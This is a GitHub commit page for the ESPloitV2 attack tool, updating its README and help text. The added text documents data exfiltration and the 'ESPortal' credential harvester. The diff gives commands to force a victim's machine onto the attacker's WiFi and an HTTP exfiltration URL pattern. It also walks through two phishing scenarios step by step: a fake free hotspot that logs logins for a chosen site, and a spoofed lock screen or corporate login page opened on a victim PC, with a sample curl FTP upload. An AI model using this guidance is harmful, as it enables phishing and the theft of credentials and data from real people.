Skip to content

Commit f62a254

Browse files
committed
Release 2.5.4
Minor: update documentation
1 parent f00ab8c commit f62a254

File tree

4 files changed

+15
-11
lines changed

4 files changed

+15
-11
lines changed

README.md

Lines changed: 7 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -272,18 +272,19 @@ Exfiltrating Data
272272
To exfiltrate data be sure ESPloit and Target machine are on the same network.
273273
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.
274274

275+
Example commands to force victim to connect to ESPloit's network(when set as AP):
275276
Windows: netsh wlan set hostednetwork mode=allow ssid="SSID-HERE" key="WIFI-PASSWORD-HERE"
276277
Linux: nmcli dev wifi connect SSID-HERE password WIFI-PASSWORD-HERE
277278

278279
For HTTP exfiltration method point the target machine to the url listed below:
279280
http://ESPloit-IP-Here/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE
280281

281-
For FTP exfiltration method use the credentials configured in the "Configure ESPloit" page.
282+
For FTP exfiltration method use the credentials configured in the "Configure ESPloit" page. Also note that only Passive Mode FTP is supported.
282283

283284
See the example payloads for more in depth examples.
284285

285286
-----
286-
ESPortal Credential Harvester
287+
ESPortal Credential Harvester(Phisher)
287288
-----
288289

289290
NOTE: Modifying any ESPortal related setting requires a reboot of the ESPloit device.
@@ -294,12 +295,13 @@ A social engineering attack vector.
294295
Redirects HTTP requests to a fake login page.
295296
Does not support HTTPS requests nor does it override cached HTTPS redirects.
296297
You can define a custom template for up to 3 specific domains, a welcome portal, and a catch-all.
298+
Captured credentials are stored on the exfiltration page in the file "esportal-log.txt".
297299

298-
Example scenario: Setup ESPloitV2 to act as a free WiFi hotspot.
300+
Example scenario 1: Target capturing login credentials from a specific domain name when victim connects to a fake free WiFi hotspot. Setup ESPloitV2 to act as a free WiFi hotspot(AP Mode, SSID: "Free WiFi", Open Network=Leave Password Blank). Set ESPortal to Enabled, Site 1 Domain(fakesite1.com). User now connects to the open network "Free WiFi", browses to fakesite1.com, they see a login prompt, user attempts to login, ESPortal gives an error, user gets frustrated and gives up. Meanwhile the credentials the user entered are logged and displayed on the Exfiltrated Data page in the file "esportal-log.txt". To make the attack even more effective I have included the ability for the attacker to make their own html templates for the login pages. If the user were to browse to another page not specified as a domain in the settings they will be greeted with a generic login prompt set from the spoof_other.html template.
299301

300-
Captured credentials are stored on the exfiltration page in the file "esportal-log.txt".
302+
Example scenario 2: Thinking slightly outside of the box... ESPloit is connected the victims network(and is not in AP mode), in this example ESPloit's IP is 192.168.1.169, FTP mode is enabled. Under ESPortal settings set the Welcome Domain to the ESPloit's IP address(192.168.1.169) and set Welcome Page On(/login). Now upload a custom login template to ESPloit named welcome.html(do not use the included welcome.html template as that is simply a greeting and we want a login page so use and rename the included template spoof_other.html to welcome.html and upload it via FTP), here is a Linux example for uploading the custom template via FTP(curl -T spoof_other.html ftp://ftp-admin:hacktheplanet@192.168.1.169/welcome.html). Now when you browse to 192.168.1.169 you are redirected to a login prompt at 192.168.1.169/login. You can now create a payload to open this webpage on the victims pc and customize the template to whatever you want. Even though there are easier ways you could use it to capture user login credentials from the victim PC, so you could fullscreen the browser window and make the custom html template look like the PC's lock screen. Or you could make it look like a login page for a website for which you wish to phish credentials. It could also be used to hide ESPloit's admin panel, perhaps when a user browses to ESPloit's IP they go to a "corporate server login page" which user is not authorized to access, remember in ESPortal mode ESPloit's admin panel shows up on http://esploitIP/esploit vs being able to access it from the default http://esploitIP when ESPortal mode is disabled. Remember social engineering is all about being creative.
301303

302-
Custom html templates can be uploaded for the ESPortal login credential harvester via FTP.
304+
Custom html templates can be uploaded for the ESPortal login credential harvester via FTP(PASV Mode only).
303305
If a custom html template is found it will override the default settings.
304306
Upon deletion the default settings are automatically restored.
305307

2.64 KB
Binary file not shown.

source/ESP_Code/HelpText.h

Lines changed: 7 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -275,18 +275,19 @@ Exfiltrating Data<br>
275275
To exfiltrate data be sure ESPloit and Target machine are on the same network.<br>
276276
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.<br>
277277
<br>
278+
Example commands to force victim to connect to ESPloit's network(when set as AP):<br>
278279
Windows: netsh wlan set hostednetwork mode=allow ssid="SSID-HERE" key="WIFI-PASSWORD-HERE"<br>
279280
Linux: nmcli dev wifi connect SSID-HERE password WIFI-PASSWORD-HERE<br>
280281
<br>
281282
For HTTP exfiltration method point the target machine to the url listed below:<br>
282283
http://ESPloit-IP-Here/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE<br>
283284
<br>
284-
For FTP exfiltration method use the credentials configured in the "Configure ESPloit" page.<br>
285+
For FTP exfiltration method use the credentials configured in the "Configure ESPloit" page. Also note that only Passive Mode FTP is supported.<br>
285286
<br>
286287
See the example payloads for more in depth examples.<br>
287288
<br>
288289
-----<br>
289-
ESPortal Credential Harvester<br>
290+
ESPortal Credential Harvester(Phisher)<br>
290291
-----<br>
291292
<br>
292293
NOTE: Modifying any ESPortal related setting requires a reboot of the ESPloit device.<br>
@@ -297,12 +298,13 @@ A social engineering attack vector.<br>
297298
Redirects HTTP requests to a fake login page.
298299
Does not support HTTPS requests nor does it override cached HTTPS redirects.<br>
299300
You can define a custom template for up to 3 specific domains, a welcome portal, and a catch-all.<br>
301+
Captured credentials are stored on the exfiltration page in the file "esportal-log.txt".<br>
300302
<br>
301-
Example scenario: Setup ESPloitV2 to act as a free WiFi hotspot.<br>
303+
Example scenario 1: Target capturing login credentials from a specific domain name when victim connects to a fake free WiFi hotspot. Setup ESPloitV2 to act as a free WiFi hotspot(AP Mode, SSID: "Free WiFi", Open Network=Leave Password Blank). Set ESPortal to Enabled, Site 1 Domain(fakesite1.com). User now connects to the open network "Free WiFi", browses to fakesite1.com, they see a login prompt, user attempts to login, ESPortal gives an error, user gets frustrated and gives up. Meanwhile the credentials the user entered are logged and displayed on the Exfiltrated Data page in the file "esportal-log.txt". To make the attack even more effective I have included the ability for the attacker to make their own html templates for the login pages. If the user were to browse to another page not specified as a domain in the settings they will be greeted with a generic login prompt set from the spoof_other.html template.<br>
302304
<br>
303-
Captured credentials are stored on the exfiltration page in the file "esportal-log.txt".<br>
305+
Example scenario 2: Thinking slightly outside of the box... ESPloit is connected the victims network(and is not in AP mode), in this example ESPloit's IP is 192.168.1.169, FTP mode is enabled. Under ESPortal settings set the Welcome Domain to the ESPloit's IP address(192.168.1.169) and set Welcome Page On(/login). Now upload a custom login template to ESPloit named welcome.html(do not use the included welcome.html template as that is simply a greeting and we want a login page so use and rename the included template spoof_other.html to welcome.html and upload it via FTP), here is a Linux example for uploading the custom template via FTP(curl -T spoof_other.html ftp://ftp-admin:hacktheplanet@192.168.1.169/welcome.html). Now when you browse to 192.168.1.169 you are redirected to a login prompt at 192.168.1.169/login. You can now create a payload to open this webpage on the victims pc and customize the template to whatever you want. Even though there are easier ways you could use it to capture user login credentials from the victim PC, so you could fullscreen the browser window and make the custom html template look like the PC's lock screen. Or you could make it look like a login page for a website for which you wish to phish credentials. It could also be used to hide ESPloit's admin panel, perhaps when a user browses to ESPloit's IP they go to a "corporate server login page" which user is not authorized to access, remember in ESPortal mode ESPloit's admin panel shows up on http://esploitIP/esploit vs being able to access it from the default http://esploitIP when ESPortal mode is disabled. Remember social engineering is all about being creative.<br>
304306
<br>
305-
Custom html templates can be uploaded for the ESPortal login credential harvester via FTP.<br>
307+
Custom html templates can be uploaded for the ESPortal login credential harvester via FTP(PASV Mode only).<br>
306308
If a custom html template is found it will override the default settings.<br>
307309
Upon deletion the default settings are automatically restored.<br>
308310
<br>

source/ESP_Code/version.h

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,2 @@
1-
String version = "2.5.3";
1+
String version = "2.5.4";
22
String latestardversion = "2.2";

0 commit comments

Comments
 (0)